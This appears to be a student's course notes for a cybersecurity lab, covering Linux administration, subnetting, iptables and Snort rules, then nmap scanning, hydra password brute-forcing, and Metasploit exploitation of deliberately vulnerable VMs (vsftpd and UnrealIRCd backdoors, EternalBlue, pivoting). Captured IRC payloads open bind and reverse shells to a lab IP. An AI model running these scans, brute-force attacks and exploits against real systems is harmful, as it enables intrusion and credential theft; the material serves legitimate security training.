24 10 2024 - CSP

The document provides a comprehensive list of software downloads, including VirtualBox, Microsoft Visual C++, Kali Linux, and various penetration testing tools. It also includes commands for Linux system administration, user and group management, file permissions, and network configuration. Additionally, it covers installation and usage of security tools like Snort and Nessus, along with subnetting concepts and firewall rules.

Uploaded by AYAN BHOWAL

Virtual box download

https://www.virtualbox.org/wiki/Downloads

VirtualBox Extension Pack:-
https://www.virtualbox.org/wiki/Downloads

Microsoft visual c++


https://learn.microsoft.com/en-us/cpp/windows/latest-supported-vc-redist?view=msvc-170
https://aka.ms/vs/17/release/vc_redist.x64.exe

Kali Linux download


https://www.kali.org/get-kali/#kali-platforms

https://cdimage.kali.org/kali-2024.2/kali-linux-2024.2-installer-amd64.iso

Metasploitable2:-
https://sourceforge.net/projects/metasploitable/files/latest/download

Windows7:-
https://drive.google.com/file/d/13vNXD2TatqYtYAxDLDP5HvOY8gtra-ny/view?usp=drive_link

Windows server 2012 R2 iso:-


https://drive.google.com/file/d/1vbDtbormmMjbF6cM1quZhJJ1sZmtvnuc/view?usp=drive_link

Basic Pentesting CTF:-
https://drive.google.com/file/d/1wkfI9cpyjouj6ox_88EqF6tKMtTHIYC1/view

Tryhackme:-
https://drive.google.com/file/d/1ZGIJW0nH5hUdTjdXsWpqruyTplBo6oR5/view?usp=sharing

HSBox1:-
https://drive.google.com/file/d/1i40AESTy0fMdoi6_v92M4OJUgs6o7YMx/view?usp=sharing

KBVuln:-
https://drive.google.com/drive/folders/1o8eP-vh7tHa82R1RDc-baKDx9pxvFqOx

Wintermute1:-
https://drive.google.com/open?id=1bHgdx0iI24jv7MDzKcrIPtd9rVFaVokR

Anydesk Download
https://anydesk.com/en
Alternative Remote access tools

Teamviewer:-
https://download.teamviewer.com/download/TeamViewerQS_x64.exe

Rustdesk:-
https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe

kiran.m@cartelsoftware.com

sudo passwd root

pwd
ls
cd
mkdir

create directory new1 in /home


new1 create subdir new2

create directory /movies/2024/english/

create directory 'kali linux' in /home

create directory India in /tmp

create directory 'test123' in the user home directory

/root
/home

vikram:x:1001:1001::/home/vikram:/bin/sh
username:password:uid:gid:full name:home dir:login shell

useradd sai
cat /etc/passwd
passwd sai

su sai
$whoami

groupadd hr
cat /etc/group

rm -rf test123

-    rw-    r--    r--
file type  owner  group  others

r=4
w=2
x=1

r-- = 4
r-x = 5
rw- =4+2=6
rwx =4+2+1=7
--x =1

rwxr--r-x=745
r--rw-rwx=467

r-xr--rwx=547
rwxrw-r--=764

r=4,w=2,x=1
create 3 dir with name
dir1 = r--rwx--x = 471
dir2 = rwx---rw- = 706
dir3 = rwx-wx-wx = 733

ugo
u=owner
g=group
o=other

+ --> add
- --> remove
= --> exact
rwx

create 3 dir
winner = rwxr-xrw-
winner2 = r--rw-rwx
dinner = r---wxr-x
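The octal conversions and the u/g/o with +, - and = syntax above, carried through as an added Python example that is not part of the original notes (the function names are chosen here): it checks the worked values on the page (745, 467, 547, 764, 471, 706, 733) and applies chmod-style expressions to a mode string.

```python
import re

PERM_BITS = {"r": 4, "w": 2, "x": 1}
# Each triplet must be r/-, w/-, x/- in that order, exactly as ls -l prints it.
TRIPLET_RE = re.compile(r"^[r-][w-][x-]$")
# One chmod clause: optional who (u/g/o/a), an operator, and the permission letters.
CLAUSE_RE = re.compile(r"^([ugoa]*)([+\-=])([rwx]*)$")


def symbolic_to_octal(perm: str) -> str:
    """'rwxr--r-x' -> '745' (owner, group, others)."""
    if len(perm) != 9:
        raise ValueError(f"expected 9 permission characters, got {perm!r}")
    digits = []
    for i in (0, 3, 6):
        triplet = perm[i:i + 3]
        if not TRIPLET_RE.match(triplet):
            raise ValueError(f"bad triplet {triplet!r} in {perm!r}")
        digits.append(str(sum(PERM_BITS[c] for c in triplet if c != "-")))
    return "".join(digits)


def octal_to_symbolic(octal: str) -> str:
    """'745' -> 'rwxr--r-x'."""
    if not re.fullmatch(r"[0-7]{3}", octal):
        raise ValueError(f"expected three octal digits, got {octal!r}")
    out = []
    for d in octal:
        v = int(d)
        out.append(("r" if v & 4 else "-") + ("w" if v & 2 else "-") + ("x" if v & 1 else "-"))
    return "".join(out)


def apply_chmod(perm: str, expression: str) -> str:
    """Apply chmod's symbolic syntax ('u+x', 'g-w', 'o=rx', 'a+r', comma-separated) to a mode string."""
    digits = [int(d) for d in symbolic_to_octal(perm)]
    for clause in expression.split(","):
        m = CLAUSE_RE.match(clause.strip())
        if not m:
            raise ValueError(f"bad chmod clause {clause!r}")
        who, op, what = m.groups()
        # chmod treats a missing who (e.g. '+x') the same as 'a': everyone.
        targets = set(range(3)) if (not who or "a" in who) else {"ugo".index(c) for c in who}
        bits = sum(PERM_BITS[c] for c in what)
        for t in targets:
            if op == "+":
                digits[t] |= bits        # add the bits
            elif op == "-":
                digits[t] &= ~bits       # remove the bits
            else:
                digits[t] = bits         # set exactly these bits
    return octal_to_symbolic("".join(str(d) for d in digits))


if __name__ == "__main__":
    for mode in ("rwxr--r-x", "r--rw-rwx", "r-xr--rwx", "rwxrw-r--"):
        print(mode, "=", symbolic_to_octal(mode))
    # exercise 9 from later in the notes: owner rw, group r, others rwx
    print(octal_to_symbolic("647"))
    print(apply_chmod("rw-r--r--", "u+x,g-r,o=rwx"))
```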

chown <username> <filename>


chgrp <groupname> <filename>

create user account worldcup and group account security

create dir india

apt update
apt list
apt search vlc
apt install vlc
apt remove vlc

apt list | grep installed


apt list | grep vlc

apt purge vlc

apt search synaptic


apt install synaptic

apt upgrade
apt install --only-upgrade vlc

dpkg -i <package name>


dpkg -r <package name>
dpkg -p <package name>

fdisk -l

fdisk /dev/sdb

Command (m for help): m


Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 1
First sector (2048-12582911, default 2048): (press Enter to accept the default)
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-12582911, default 12582911): +500M
Created a new partition 1 of type 'Linux' and of size 500 MiB.

Command (m for help): p


Disk /dev/sdb: 6 GiB, 6442450944 bytes, 12582912 sectors
Disk model: VBOX HARDDISK
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xf48c1c52

Device Boot Start End Sectors Size Id Type


/dev/sdb1 2048 1026047 1024000 500M 83 Linux
q=quit,w=write or save,d=delete
fdisk -l
gdisk /dev/sdc

Command (? for help): n


Partition number (1-128, default 1): 1
First sector (34-8388574, default = 2048) or {+-}size{KMGTP}: (press Enter to accept the default)
Last sector (2048-8388574, default = 8386559) or {+-}size{KMGTP}: +50M
Current type is 8300 (Linux filesystem)
Hex code or GUID (L to show codes, Enter = 8300): (press Enter to accept the default)
Changed type of partition to 'Linux filesystem'
p=print,q=quit,w=save

mkfs.ext4 /dev/sdc1

ps aux

msfconsole

ps aux | grep msfconsole

kill <process id>


kill -9 <process id>

cd /etc/init.d/

service <service name> status|start|stop|restart|reload

service apache2 start


ip a
note:eth0:<ip address>
open browser: enter ip address

service apache2 stop


in browser private windows: enter ip address

ls -lh
bzip2 <filename>
bunzip2 <filename.bz2>

gzip <filename>
gunzip <filename.gz>

compress <filename>
uncompress <filename.Z>

tar -cvf grp.tar 22940.txt 'Booklet on An Introduction to Cyber Crime.pdf.bz2' Untitled.jpeg


tar -cvf file.tar file1 file2 file3 file4

tar -tvf file.tar (display files that grouped)

tar -xvf filename

https://parrotsec.org/download/

1)initiate nginx service


2)Create password for root account
3)Install any application using package manager (vlc or vsftpd)
4)Create 3 files with name n1,n2,n3 and compress the file using bzip2
5)Add virtual hard drive (4GB) to parrot linux and create GPT partition
6)Create a group sysmgrs. Create users test1, test2 & test3. Users test1 & test2 should be a part of the sysmgrs group. Password of all users is "linux123"
7)Create a user jean. User id of this user should be 2556.
8)Secure /netdir such that only group sysmgrs can access it. Group owner should be sysmgrs.
9)Configure permission for the file new22.txt, where owner should have rw, group should have r and others should have rwx.

touch new.txt

alt+a to select
alt +6 to copy
ctrl+v to paste
ctrl+k to cut
ctrl+w to search
ctrl+r to replace
ctrl+x to exit

pluma new.txt (GUI, Default in parrot)


mousepad new.txt (GUI,Default in kali)

to install any text editor


apt install <name of text editor>

find / -name new.txt


find / -iname new.txt
find / -type d -name Desktop
find / -type f -name new.txt
find / -perm 777
find / -perm -u=rw
find / -perm -g=rwx -type d
find / -name '*.pdf'        # quote the glob so the shell does not expand it first
find /home -name '*.jpeg'
find /var -name '*.log'
find / -name 'cyber*.pdf'
find / -name 'Desk*'
find / -iname 'Desk*'

lscpu
lsmem
lsblk
lspci
apt install hwinfo
hwinfo

https://fedoraproject.org/workstation/download

yum update
yum list
yum search mousepad
yum install mousepad
yum remove vlc
yum list | grep installed
yum list | grep vlc

yum remove vlc    # yum has no purge subcommand; remove is the equivalent

yum search synaptic
yum install synaptic

yum upgrade
yum upgrade vlc    # yum's form of apt's --only-upgrade

rpm -i <package name>


rpm -e <package name>

hostname
hostnamectl
uname
uname -a
whoami
id
df -h
history
man <command name> #help

CLASS A N.H.H.H/8 255.0.0.0


CLASS B N.N.H.H/16 255.255.0.0
CLASS C N.N.N.H/24 255.255.255.0

CLASS C
NETWORK BITS:- 24 HOST BITS:- 8
SUBNET MASK:- 255.255.255.0/24

REQ=50

NO OF HOST BITS REQ(h):- 2^K-2>=REQ


k=0,1,2,3,4,5,6,7,8,9,10...

2^0-2>=50
-1>=50

2^1-2>=50
0>=50
2^2-2>=50
2>=50

2^6-2>=50
64-2>=50
62>=50
k=h
h=6

NO OF NETWORK BITS REQ (n)= TOTAL NO OF HOST BITS - REQ HOST BITS
n=H-h
n=8-6
n=2

CUST SUBNET MASK=DEFAULT SUBNET MASK+n
=24+2
=26=11111111.11111111.11111111.11000000
=255.255.255.192

NO OF HOST PER NETWORK=2^h
=2^6
=64

TOTAL NO OF NETWORK = 2^n
= 2^2
=4

200.10.20.25
200.10.20.0
200.10.20.1
200.10.20.2
200.10.20.62
200.10.20.63

200.10.20.64

200.10.20.127
200.10.20.128

200.10.20.191
200.10.20.192

200.10.20.255

255.255.255.192

REQ=10
CLASS C
N=24 H=8 N.N.N.H/24 255.255.255.0

h=2^k-2>=REQ

2^0-2>=10
-1>=10

2^1-2>=10
0>=10

2^2-2>=10
2>=10

2^3-2>=10
6>=10

2^4-2>=10
14>=10

h=4

n=H-h
n=8-4
n=4

SUBNET MASK=24+n
=24+4
=28
=255.255.255.240

NO OF HOST PER NETWORK=2^h


=2^4
=16

TOTAL NO OF NETWORK = 2^n


= 2^4
= 16

195.50.100.200

195.50.100.0

195.50.100.15
195.50.100.16

195.50.100.31
195.50.100.32

195.50.100.47

195.50.100.255

REQ=5
CLASS A
N=8 H=24 N.H.H.H/8 255.0.0.0

h=2^k-2>=REQ

2^2-2>=5
2>=5
2^3-2>=5
6>=5
h=3

n=H-h
=24-3
n=21

SUBNET=8+n
8+21=29
11111111.11111111.11111111.11111000
255.255.255.248

NO OF HOST PER NETWORK=2^h


=2^3
=8

TOTAL NO OF NETWORK = 2^n


=2^21
=2097152

100.20.35.55

100.0.0.0

100.0.0.7

100.0.0.8

100.0.0.15

100.255.255.255

https://www.calculator.net/ip-subnet-calculator.html
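The three subnetting calculations above (class C with 50 and with 10 hosts, class A with 5 hosts), carried through in Python as an added example that is not part of the original notes: it applies the same steps (2^k-2 >= REQ, n = H-h, custom mask, hosts per network, number of networks) and lists the subnet ranges. The function names are chosen here.

```python
import ipaddress
from itertools import islice

# Classful default prefix lengths used in the notes: class A /8, B /16, C /24.
CLASS_PREFIX = {"A": 8, "B": 16, "C": 24}


def address_class(address: str) -> str:
    """Class from the first octet: A below 128, B below 192, otherwise C."""
    first = int(address.split(".")[0])
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    return "C"


def host_bits_for(required_hosts: int) -> int:
    """Smallest h with 2^h - 2 >= REQ, i.e. the notes' 2^k-2>=REQ test tried from k=0 upward."""
    h = 0
    while (2 ** h) - 2 < required_hosts:
        h += 1
    return h


def subnet_plan(address: str, required_hosts: int, first_n: int = 3) -> dict:
    """Work the notes' method: H, h, n, custom mask, hosts per network, number of networks, ranges."""
    default_prefix = CLASS_PREFIX[address_class(address)]
    total_host_bits = 32 - default_prefix          # H
    h = host_bits_for(required_hosts)              # host bits kept
    n = total_host_bits - h                        # bits borrowed for subnetting
    new_prefix = default_prefix + n                # custom mask length
    this_net = ipaddress.ip_network(f"{address}/{new_prefix}", strict=False)
    classful = ipaddress.ip_network(f"{address}/{default_prefix}", strict=False)
    # subnets() is a generator, so islice keeps the class A case (2^21 subnets) cheap.
    first = [f"{s.network_address}-{s.broadcast_address}"
             for s in islice(classful.subnets(new_prefix=new_prefix), first_n)]
    return {
        "class": address_class(address),
        "H": total_host_bits,
        "h": h,
        "n": n,
        "prefix": new_prefix,
        "mask": str(this_net.netmask),
        "addresses_per_network": 2 ** h,           # the notes' "NO OF HOST PER NETWORK"
        "usable_hosts": 2 ** h - 2,                # minus network and broadcast addresses
        "number_of_networks": 2 ** n,
        "this_subnet": f"{this_net.network_address}-{this_net.broadcast_address}",
        "first_subnets": first,
    }


if __name__ == "__main__":
    for addr, req in (("200.10.20.25", 50), ("195.50.100.200", 10), ("100.20.35.55", 5)):
        plan = subnet_plan(addr, req)
        print(addr, "REQ", req, "->", f"/{plan['prefix']}", plan["mask"],
              "hosts/net", plan["addresses_per_network"], "nets", plan["number_of_networks"],
              "this subnet", plan["this_subnet"])
```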

iptables -L
iptables -A OUTPUT -p tcp --dport 80 -j DROP
iptables -L
iptables -D OUTPUT -p tcp --dport 80 -j DROP
iptables -L

iptables -L
iptables -A OUTPUT -p tcp -s 192.168.1.96 -d 44.228.249.3 --dport 80 -j DROP
iptables -L
iptables -D OUTPUT -p tcp -s 192.168.1.96 -d 44.228.249.3 --dport 80 -j DROP
iptables -L

service apache2 start

apt update
apt install vsftpd
service vsftpd start

Windows 7
open powershell
ftp <kali ip>
ftp 192.168.1.66

reboot
apt update
apt install iptables-persistent
iptables -L
cat /etc/iptables/rules.v4
iptables -A INPUT -p tcp -s 192.168.1.18 -d 192.168.1.66 --dport 80 -j DROP
iptables-save > /etc/iptables/rules.v4
cat /etc/iptables/rules.v4
update-rc.d netfilter-persistent enable
reboot
iptables -L

apt update
apt install snort

touch new.rules
mousepad new.rules
alert icmp 192.168.1.18 any -> 192.168.1.66 any (msg:"ICMP FROM WINDOWS 7 OS";sid:1000000001)
alert tcp 192.168.1.66 any -> 44.228.249.3 80 (msg:"ACCESSING TESTPHP WEBSITE";sid:1000000002)
ctrl+s

snort -c /etc/snort/snort.lua -R /root/new.rules -i eth0 -A alert_fast -s 65535 -k none

<action> <protocol type> <src ip> <src port> <direction> <dst ip> <dst port> (msg:"YOUR WISH";sid:100000000001)

OLD VERSION:- snort -q -A console -c /etc/snort/snort.conf -i eth0
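The rule header layout just described, as an added Python example that is neither from the original notes nor Snort's own code: it parses a constructed copy of the two rules written into new.rules above and evaluates packet 5-tuples against them, honouring any, CIDR blocks, lo:hi port ranges and the -> versus <> direction. parse_rules() and match_packet() are names chosen here.

```python
import ipaddress
import re

# Constructed copy of the two rules the notes put into new.rules.
SAMPLE_RULES = """
alert icmp 192.168.1.18 any -> 192.168.1.66 any (msg:"ICMP FROM WINDOWS 7 OS";sid:1000000001)
alert tcp 192.168.1.66 any -> 44.228.249.3 80 (msg:"ACCESSING TESTPHP WEBSITE";sid:1000000002)
"""

# <action> <protocol> <src ip> <src port> <direction> <dst ip> <dst port> (options)
HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<direction>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<options>.*)\)\s*$"
)


def parse_options(text: str) -> dict:
    """'msg:"X";sid:1' -> {'msg': 'X', 'sid': '1'}: semicolon-separated key:value pairs."""
    options = {}
    for item in text.split(";"):
        item = item.strip()
        if item:
            key, _, value = item.partition(":")
            options[key.strip()] = value.strip().strip('"')
    return options


def parse_rules(text: str) -> list:
    """Parse one rule per line; blank lines and '#' comments are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = HEADER_RE.match(line)
        if m is None:
            raise ValueError(f"unparseable rule: {line}")
        rule = m.groupdict()
        rule["options"] = parse_options(rule["options"])
        if "sid" not in rule["options"]:
            raise ValueError(f"rule without sid: {line}")
        rules.append(rule)
    return rules


def ip_matches(pattern: str, ip: str) -> bool:
    """'any', a single address, or a CIDR block."""
    if pattern == "any":
        return True
    return ipaddress.ip_address(ip) in ipaddress.ip_network(pattern, strict=False)


def port_matches(pattern: str, port: int) -> bool:
    """'any', a single port, or a lo:hi range where either bound may be omitted."""
    if pattern == "any":
        return True
    if ":" in pattern:
        lo, _, hi = pattern.partition(":")
        return (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    return int(pattern) == port


def _endpoints_match(rule: dict, src: str, sport: int, dst: str, dport: int) -> bool:
    return (ip_matches(rule["src"], src) and port_matches(rule["sport"], sport)
            and ip_matches(rule["dst"], dst) and port_matches(rule["dport"], dport))


def match_packet(rules: list, proto: str, src: str, sport: int, dst: str, dport: int) -> list:
    """Return [(sid, msg)] for each rule whose header matches; '<>' matches either direction."""
    hits = []
    for rule in rules:
        if rule["proto"] not in ("any", "ip", proto):
            continue
        forward = _endpoints_match(rule, src, sport, dst, dport)
        reverse = rule["direction"] == "<>" and _endpoints_match(rule, dst, dport, src, sport)
        if forward or reverse:
            hits.append((int(rule["options"]["sid"]), rule["options"].get("msg", "")))
    return hits


if __name__ == "__main__":
    rules = parse_rules(SAMPLE_RULES)
    # ICMP carries no ports, so 0 is passed and the rule's "any" accepts it.
    print(match_packet(rules, "icmp", "192.168.1.18", 0, "192.168.1.66", 0))
    print(match_packet(rules, "tcp", "192.168.1.66", 51515, "44.228.249.3", 80))
```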

In Kali
nessus download
https://www.tenable.com/downloads/nessus?loginAttempted=true
Linux-Ubuntu-amd64

cd /root/Downloads
dpkg -i Nessus-10.7.5-ubuntu1604_amd64.deb
service nessusd start

In browser
https://127.0.0.1:8834

test123@mailinator.com

Calculate CVSS score

attack can be done from anywhere
no end-user interaction required
no firewall or security devices
no attack requirement
MFA required

Attacker can access data completely, no modification of data, service not available to anyone

Subsequent System Impact Metrics

no impact on another system

service nessusd start


https://127.0.0.1:8834

ip r

fping -h
fping -g 192.168.1.0/24
fping -g 192.168.1.0/24 -a -q

arp-scan 192.168.1.0/24

netdiscover -i eth0

cd Downloads
ls
dpkg -i ipscan_3.9.1_amd64.deb
ipscan

nmap -h
nmap -sn 192.168.1.1
nmap -sn 192.168.1.1 192.168.1.55
nmap -sn 192.168.1.1 192.168.1.55 192.168.1.2
nmap -sn 8.8.8.8
nmap -sn amazon.in
nmap -sn amazon.in 8.8.8.8 192.168.1.1
nmap -sn 192.168.1.0/24
nmap -sn 192.168.1.50-111

nmap -sn 192.168.1.0/24 --exclude 192.168.1.1


nmap -sn 192.168.1.0/24 --exclude 192.168.1.1,192.168.1.5
nmap -sn 192.168.1.0/24 --exclude 192.168.1.1,192.168.1.5,192.168.1.100,192.168.1.200

ping -6 facebook.com
nmap -6 -sn google.com
nmap -6 -sn 2a03:2880:f137:182:face:b00c:0:25de

mousepad ip.txt
nmap -sn -iL ip.txt
cat ip.txt

TCP CONNECT SCAN- FULL SCAN


-sT
nmap -sT scanme.nmap.org
scanme.nmap.org
altoromutual.com
vulnweb.com
ip.addr==192.168.1.17 && tcp.port==80

TCP HALF SCAN


-sS
nmap -sS scanme.nmap.org
nmap -sS 192.168.1.17
2-WAY HS
SYN --> SYN+ACK OPEN
SYN --> RST+ACK CLOSE

FIN SCAN
-sF

nmap -sF 192.168.1.17

OPEN - NO RESPONSE
CLOSE - RESPONSE

XMAS SCAN
-sX
URG,PSH,FIN

OPEN - NO RESPONSE
CLOSE - RESPONSE

-v
-vv (#print more info)

Metasploitable download
https://sourceforge.net/projects/metasploitable/files/latest/download

HSBOX1 download
https://drive.google.com/file/d/1i40AESTy0fMdoi6_v92M4OJUgs6o7YMx/view?usp=drive_link

nmap -sT 192.168.1.30 -dd (TOP 1000 ports)


nmap -sT 192.168.1.30 -p- (65535)
nmap -sT 192.168.1.30 -p 80
nmap -sT 192.168.1.30 -p 25,110,143
nmap -sT 192.168.1.30 -p 1-100
nmap -sT 192.168.1.30 -p 1-520,6667
nmap -sT 192.168.1.30 -p mysql

nmap -sU 192.168.1.30 -p 53,67,161

nmap -sT -sU -p T:21,25,80,U:53,514 192.168.1.30

Version detection scan


-sV
nmap -sT 192.168.1.30 -sV

updatedb
locate '*.nse'        # quote the glob so the shell does not expand it

locate '*.nse' | grep ftp

nmap --script-help /usr/share/nmap/scripts/ftp-anon.nse

nmap --script /usr/share/nmap/scripts/ftp-anon.nse -p 21 -sV 192.168.1.30

locate '*.nse' | grep ftp

nmap --script-help /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
nmap --script /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse -sV -p 21 192.168.1.30

nmap --script 'ftp-*' -sV -p 21 192.168.1.30

locate '*.nse' | grep smb

nmap --script-help /usr/share/nmap/scripts/smb-os-discovery.nse
nmap --script /usr/share/nmap/scripts/smb-os-discovery.nse -p 445 -sV 192.168.1.17
locate '*.nse' | grep smb

nmap --script-help /usr/share/nmap/scripts/smb-enum-shares.nse

nmap --script /usr/share/nmap/scripts/smb-enum-shares.nse --script-args smbusername=forensic,smbpassword=admin -p 445 -sV 192.168.1.17

locate '*.nse' | grep smb

nmap --script-help /usr/share/nmap/scripts/smb-vuln-ms17-010.nse
nmap --script /usr/share/nmap/scripts/smb-vuln-ms17-010.nse -p 445 -sV 192.168.1.17

nmap --script 'smb-*' -p 445 -sV 192.168.1.17

https://nmap.org/nsedoc/categories/

auth
broadcast
brute
default
discovery
dos
exploit
external
fuzzer
intrusive
malware
safe
version
vuln

nmap --script auth -sV 192.168.1.30


nmap --script vuln -sV 192.168.1.30

nmap -sT 192.168.1.30 -O

nmap --script-help default

nmap --script default 192.168.1.30 -sV

nmap -sC 192.168.1.30 -sV

nmap -sC -sV -O 192.168.1.30

nmap -A 192.168.1.30
-A=-sV -sC -O

-n disable dns resolution


-Pn skip host discovery
-T0 to -T5 timing template
-T0 --> slow
-T5 --> fast
-T3 --> default

https://weakpass.com/

https://github.com/danielmiessler/SecLists

cd /usr/share/wordlists

touch username.txt
touch password.txt
mousepad username.txt
mousepad password.txt

hydra -L /root/username.txt -P /root/password.txt 192.168.1.30 ftp -s 21

hydra -L /root/username.txt -P /root/password.txt 192.168.1.30 ftp -s 21 -V

hydra -L /root/username.txt -P /root/password.txt 192.168.1.30 ftp -s 21 -V -t 32


hydra -L /root/username.txt -P /root/password.txt 192.168.1.30 ftp -s 21 -V -t 4

hydra -l msfadmin -P /root/password.txt ftp://192.168.1.30

hydra -L /root/username.txt -p msfadmin ftp://192.168.1.30

hydra -L /root/username.txt -P /root/password.txt 192.168.1.201 smb -s 445 -V


hydra -L /root/username.txt -P /root/password.txt smb://192.168.1.201

HSBOX1
nmap,hydra,crunch,cewl

nmap 192.168.1.17
nmap 192.168.1.17 -p-
nmap 192.168.1.17 -p 21,1515,3535 -sV
locate '*.nse' | grep ftp
nmap --script /usr/share/nmap/scripts/ftp-anon.nse -sV -p 21 192.168.1.17
ftp 192.168.1.17
ftp>ls
ftp>get note.txt
ftp>quit
cat note.txt
cewl http://192.168.1.17:1515 -w wordlist1.txt
cat wordlist1.txt
hydra -l jack -P /root/wordlist1.txt 192.168.1.17 ssh -s 3535 -V
ssh jack@192.168.1.17

password Cyberspace

crunch 4 4 ac15 -o wordlist2.txt


cat wordlist2.txt
hydra -l goblin -P /root/wordlist2.txt 192.168.1.17 ssh -s 3535
ssh goblin@192.168.1.17 -p 3535

password ca51

find / -name final.sh


./final.sh /home/goblin

Info gathering
theHarvester -d certifiedhacker.com -l 1000 -b hackertarget

apt update
apt install subfinder
subfinder -d certifiedhacker.com

dig sftp.certifiedhacker.com

In browser:- dome github


git clone https://github.com/v4d1/Dome.git
ls
cd Dome
ls
pip install -r requirements.txt
python dome.py -m passive -d certifiedhacker.com
python dome.py -m active -d certifiedhacker.com

/usr/share/metasploit-framework/modules/

msfconsole
msf6>search ftp
msf6>search ftp type:auxiliary
msf6>info auxiliary/scanner/ftp/anonymous
msf6>use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) >show options
msf6 auxiliary(scanner/ftp/anonymous) >set RHOSTS 192.168.0.148
msf6 auxiliary(scanner/ftp/anonymous) >show options
msf6 auxiliary(scanner/ftp/anonymous) >run

search ftp type:auxiliary


info auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.0.148
run

search ftp type:auxiliary


info auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ftp/ftp_login
show options
set RHOSTS 192.168.0.148
set PASS_FILE /root/password.txt
set USER_FILE /root/username.txt
show options
run

search ssh type:auxiliary


use auxiliary/scanner/ssh/ssh_version
show options
set RHOSTS 192.168.0.148
show options
run

search ssh type:auxiliary


info auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
show missing
set RHOSTS 192.168.0.148
set USER_FILE /root/username.txt
set PASS_FILE /root/password.txt
run
search telnet type:auxiliary
use auxiliary/scanner/telnet/telnet_version
show options
set RHOSTS 192.168.0.148
show options
run

msfconsole
search vsftp type:exploit
info exploit/unix/ftp/vsftpd_234_backdoor
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
info payload/cmd/unix/interact
show options
set RHOSTS 192.168.0.148
show options
run
sessions
sessions -i 1
sessions

ctrl+c abort
ctrl+z background

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...


:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP
address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys
%ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new
IO::Socket::INET(LocalPort,4567,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c
,r);while(<>){if($_=~ /(.*)/){system $1;}};'
:irc.Metasploitable.LAN 451 AB;perl :You have not registered

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...


:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP
address instead
AB;ruby -rsocket -e 'exit if
fork;c=TCPSocket.new("192.168.0.139","4568");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print
io.read}end'
:irc.Metasploitable.LAN 451 AB;ruby :You have not registered
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP
address instead
AB;sh -c '(sleep 4444|telnet 192.168.0.139 4569|while : ; do sh && break; done 2>&1|telnet
192.168.0.139 4569 >/dev/null 2>&1 &)'
:irc.Metasploitable.LAN 451 AB;sh :You have not registered

search unrealirc
use exploit/unix/irc/unreal_ircd_3281_backdoor
show payloads
set payload payload/cmd/unix/bind_perl
show options
set RHOST 192.168.0.148
set LPORT 4567
show options
exploit

show payloads
set payload payload/cmd/unix/reverse_ruby
show options
set LHOST 192.168.0.139
set LPORT 4568
show options
exploit
sessions

show payloads
use payload/cmd/unix/reverse
show options
search unrealirc
use exploit/unix/irc/unreal_ircd_3281_backdoor
show payloads
set payload payload/cmd/unix/reverse
show options
set LPORT 4569
exploit
show payloads

Johnwick link to download


https://mega.nz/file/ebA3BbqZ#iCcrtFU4_L198-uhNMZI0JH4Fbf5kMV6YKW6nb4P2W8

Basic pentest link https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova


nmap 192.168.0.159
nmap 192.168.0.159 -p 21,22,80 -A
locate '*.nse' | grep ftp
nmap --script-help /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
nmap --script /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse 192.168.0.159 -sV

msfconsole
search proft
search proft type:exploit
info exploit/unix/ftp/proftpd_133c_backdoor
use exploit/unix/ftp/proftpd_133c_backdoor
show payloads
set payload payload/cmd/unix/reverse
show options
set RHOSTS 192.168.0.159
ip a
set LHOST 192.168.0.139
show options
show missing
set LPORT 4569
exploit

ip r
nmap -sn 192.168.0.0/24

download james.jpg and extract metadata


exiftool james.jpg

hydra -l jamesbond -P /usr/share/wordlists/wifite.txt 192.168.0.177 ssh -s 22

ssh jamesbond@192.168.0.177
password: butterfly

https://gtfobins.github.io/

sudo -l

sudo ftp
!/bin/sh

nmap 192.168.0.107
nmap 192.168.0.107 -A
nmap --script smb-* -p 445 -sV 192.168.0.107
searchsploit ms17-010
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.0.107
set LHOST 192.168.0.159
set LPORT 4567
show options
exploit

meterpreter>sysinfo

KALI IP: 192.168.0.156

TARGET 1: 192.168.0.108
192.168.100.102

NOTE: sudo dhclient

TARGET 2: 192.168.100.117

msfconsole
search ssh type:auxiliary
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.0.108 (target 1 BA)
set USERNAME msfadmin
set PASSWORD msfadmin
exploit

sessions

sessions -u 1
sessions

search autoroute
info post/multi/manage/autoroute
use post/multi/manage/autoroute
show options
sessions
set SESSION 2
show options
run
route

search ping type:post


info post/multi/gather/ping_sweep
use post/multi/gather/ping_sweep
show options
set RHOSTS 192.168.100.0/24
